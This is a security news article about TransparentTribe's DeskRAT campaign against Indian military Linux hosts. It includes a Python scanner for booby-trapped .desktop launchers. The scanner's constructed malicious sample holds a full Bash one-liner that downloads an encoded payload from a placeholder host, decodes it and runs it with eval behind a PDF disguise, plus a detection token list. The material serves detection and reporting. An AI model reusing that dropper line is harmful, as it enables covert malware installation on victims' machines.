The Pakistani-linked hacking group TransparentTribe has escalated its cyber espionage by targeting Linux-based systems in Indian military organizations with a new Golang-based remote access trojan called DeskRAT. The campaign, traced back to June 2025, uses sophisticated phishing tactics to deliver the malware. This development highlights the group's advancing technical capabilities amid regional tensions.
TransparentTribe, an intrusion set linked to Pakistan and active since at least 2013, has intensified its operations against Indian defense targets. The campaign was first documented by CYFIRMA in July 2025, with initial activity dating to June 2025. Sekoia analysts later identified updated samples in August and September 2025, revealing an evolved infection chain that the group has refined to evade detection.
The attacks begin with phishing emails carrying ZIP archives with names such as “MoM_regarding_Defence_Sectors_by_Secy_Defence”. Extracting the archive yields a .desktop launcher file that poses as a legitimate PDF, complete with a PDF icon. The file hides its malicious Bash commands within thousands of lines of commented-out PNG image data, with the key [Desktop Entry] section buried between large blocks of that data so that a casual inspection sees only image bytes.
The Bash one-liner creates a unique filename in the /tmp/ directory from a timestamp, then uses curl to download an encoded binary from a remote staging server. The payload is converted from hexadecimal with xxd and Base64-decoded before being executed through eval. To keep up the deception, Firefox opens a decoy PDF fetched from the attackers' server, masking the malware's installation.
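The infection chain above can be detected at the launcher stage before anything is downloaded. The following heuristic scanner is an added example written for this article (not code from Sekoia or CYFIRMA): it parses a .desktop file, skipping the comment padding the group uses to bury the [Desktop Entry] section, and flags a launcher that masquerades as a PDF while its Exec= line stages a file in /tmp, pipes it through xxd and base64 and hands it to eval. The two .desktop samples and the staging.invalid host are constructed for the demonstration.

```python
"""Heuristic scanner for booby-trapped .desktop launchers (added example)."""
from typing import Dict, List

# Constructed samples (not real campaign artifacts). The malicious one mimics
# the layout described above: a [Desktop Entry] block sandwiched between
# comment lines of PNG data, posing as a PDF, with an Exec= Bash one-liner
# that stages a file in /tmp, decodes it and evals it.
MALICIOUS_SAMPLE = """\
# iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk
# YPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==
[Desktop Entry]
Type=Application
Name=MoM_regarding_Defence_Sectors_by_Secy_Defence.pdf
Icon=application-pdf
Exec=bash -c "f=/tmp/$(date +%s); curl -s http://staging.invalid/p | xxd -r -p | base64 -d > $f; eval \\"$(cat $f)\\"; firefox http://staging.invalid/decoy.pdf"
# iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk
"""
BENIGN_SAMPLE = """\
[Desktop Entry]
Type=Application
Name=Firefox
Icon=firefox
Exec=firefox %u
"""

# Tokens a launcher for a "document" has no business containing.
SUSPICIOUS_TOKENS = ["bash -c", "curl", "wget", "xxd", "base64", "eval", "/tmp/"]

def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return key=value pairs of the [Desktop Entry] group, ignoring comments."""
    entry: Dict[str, str] = {}
    in_group = False
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # comment padding (e.g. embedded PNG data)
        if line.startswith("["):
            in_group = line.strip() == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def assess(text: str) -> Dict[str, object]:
    """Flag PDF-lookalike launchers whose Exec= line stages and evals a payload."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    hits: List[str] = [t for t in SUSPICIOUS_TOKENS if t in exec_line]
    comment_lines = sum(1 for l in text.splitlines() if l.lstrip().startswith("#"))
    looks_like_pdf = "pdf" in (entry.get("Icon", "") + entry.get("Name", "")).lower()
    return {
        "hits": hits,
        "comment_lines": comment_lines,
        "pdf_masquerade": looks_like_pdf and entry.get("Type") == "Application",
        "suspicious": len(hits) >= 2 or (looks_like_pdf and bool(hits)),
    }
```

In a real deployment the same parser can be run over every .desktop file extracted from incoming archives or dropped into user home directories, with the comment-line count serving as a second signal since legitimate launchers carry almost none.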
DeskRAT, written in Golang for cross-platform compatibility, establishes persistent access via WebSocket connections for command and control. The infrastructure has shifted from hosting ZIP files on services like Google Drive to dedicated staging servers, showing improved operational security. Sekoia implemented YARA rules to detect these activities, uncovering samples unknown to other vendors and underscoring TransparentTribe's efforts to outpace defenses in Indian military Linux environments.